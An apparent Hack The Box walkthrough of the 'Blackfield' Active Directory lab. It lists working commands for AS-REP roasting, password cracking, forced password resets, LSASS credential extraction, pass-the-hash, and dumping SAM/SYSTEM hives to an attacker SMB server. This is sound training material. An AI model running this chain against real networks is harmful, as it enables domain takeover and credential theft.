Overview
Blackfield is a hard-difficulty Active Directory machine focused on SMB enumeration, Kerberos abuse, BloodHound privilege analysis, credential extraction from LSASS memory dumps, and Backup Operators privilege abuse.
The machine demonstrates how weak Active Directory configurations and excessive privileges can lead to full system compromise.
Attack Path Summary
Anonymous SMB Enumeration
↓
Username Discovery
↓
AS-REP Roasting
↓
Offline Password Cracking
↓
BloodHound Enumeration
↓
ForceChangePassword Abuse
↓
Forensic Share Access
↓
LSASS Dump Extraction
↓
Pass-the-Hash via WinRM
↓
Backup Operators Abuse
↓
Administrator Hash Extraction
Reconnaissance
Nmap Scan
Initial service enumeration:
nmap -sVC -Pn -oA nmap/blackfield 10.129.3.93
Results:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP
445/tcp open microsoft-ds
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP
5985/tcp open http Microsoft HTTPAPI httpd 2.0
The exposed services strongly suggested that the target was functioning as an Active Directory Domain Controller.
SMB Enumeration
Enumerating SMB shares anonymously:
smbclient -L //10.129.3.93/
Discovered shares:
ADMIN$
C$
forensic
IPC$
NETLOGON
profiles$
SYSVOL
Anonymous SMB access was enabled, and the profiles$ share allowed read access.
Connecting to the share:
smbclient //10.129.3.93/profiles$
Listing contents:
smb: \> ls
More than 300 user profile directories were discovered inside the share.
Initial Foothold
AS-REP Roasting
The discovered usernames were saved into users.txt.
Using Impacket:
impacket-GetNPUsers BLACKFIELD.local/ \
-usersfile users.txt \
-no-pass \
-dc-ip 10.129.3.93
Successful output:
$krb5asrep$23$support@BLACKFIELD.LOCAL:...
The support account was configured with Kerberos pre-authentication disabled, making it vulnerable to AS-REP Roasting.
Cracking the Hash
Using Hashcat:
hashcat -m 18200 user.hash /usr/share/wordlists/rockyou.txt
Recovered credentials:
support:#00^BlackKnight
BloodHound Enumeration
Using BloodHound-Python:
bloodhound-python \
-u 'support' \
-p '#00^BlackKnight' \
-ns 10.129.3.93 \
-d BLACKFIELD.local \
-c all
BloodHound analysis revealed that the support user had ForceChangePassword rights over the audit2020 account.
ForceChangePassword Abuse
The ForceChangePassword permission allows an attacker to reset another user’s password without knowing the current password.
Using BloodyAD:
bloodyAD --host 10.129.3.93 \
-d BLACKFIELD.local \
-u 'support' \
-p '#00^BlackKnight' \
set password audit2020 'Password123!'
[+] Password changed successfully!
Forensic Share Enumeration
After compromising audit2020, further enumeration revealed access to the forensic share.
Inside the share, a memory_analysis directory contained an lsass.zip archive.
After extracting the archive, an lsass.DMP file was recovered.
LSASS Credential Extraction
Using Pypykatz:
pypykatz lsa minidump lsass.DMP
Recovered credentials:
Username: svc_backup
NT: 9658d1d1dcd9250115e2205d9f48400d
Recovered hash:
svc_backup:9658d1d1dcd9250115e2205d9f48400d
The recovered NTLM hash could be used for Pass-the-Hash authentication.
WinRM Access
Using Evil-WinRM:
evil-winrm \
-u 'svc_backup' \
-H '9658d1d1dcd9250115e2205d9f48400d' \
-i BLACKFIELD.local
Successful authentication granted shell access as svc_backup.
Privilege Escalation
Backup Operators Abuse
Checking assigned privileges:
whoami /priv
The svc_backup account possessed:
SeBackupPrivilegeSeRestorePrivilege
Additionally, the account was a member of the Backup Operators group.
Backup Operators group can bypass normal file permissions and back up sensitive system files such as the SAM and SYSTEM registry hives.Dumping SAM and SYSTEM
Saving registry hives:
reg save hklm\sam C:\Windows\Tasks\SAM
reg save hklm\system C:\Windows\Tasks\SYSTEM
Transferring Files
Starting an SMB server on the attacker machine:
impacket-smbserver shared ./ -smb2support
Copying files from the target:
copy SAM \\10.10.14.208\shared\SAM
copy SYSTEM \\10.10.14.208\shared\SYSTEM
Extracting Administrator Hashes
Using Impacket SecretsDump:
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Recovered hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
The Administrator NTLM hash was successfully extracted through Backup Operators abuse.
Skills & Concepts
- SMB Enumeration
- Username Enumeration
- Kerberos Abuse
- AS-REP Roasting
- Offline Password Cracking
- BloodHound Privilege Analysis
- ForceChangePassword Abuse
- LSASS Credential Extraction
- Pass-the-Hash
- Backup Operators Abuse
- SeBackupPrivilege Abuse
- Active Directory Privilege Escalation
Tools Used
- Nmap
- smbclient
- Impacket
- Hashcat
- BloodHound
- BloodHound-Python
- BloodyAD
- Pypykatz
- Evil-WinRM
Lessons Learned
Blackfield demonstrates how multiple small Active Directory weaknesses can be chained together into full compromise:
- Anonymous SMB enumeration exposed valid usernames
- Kerberos misconfiguration enabled AS-REP Roasting
- Weak passwords allowed offline cracking
- Excessive ACL permissions enabled ForceChangePassword abuse
- Sensitive forensic artifacts leaked LSASS credentials
- Backup Operators privileges enabled extraction of Administrator hashes
The machine highlights the dangers of privilege delegation and insecure credential handling in enterprise Active Directory environments.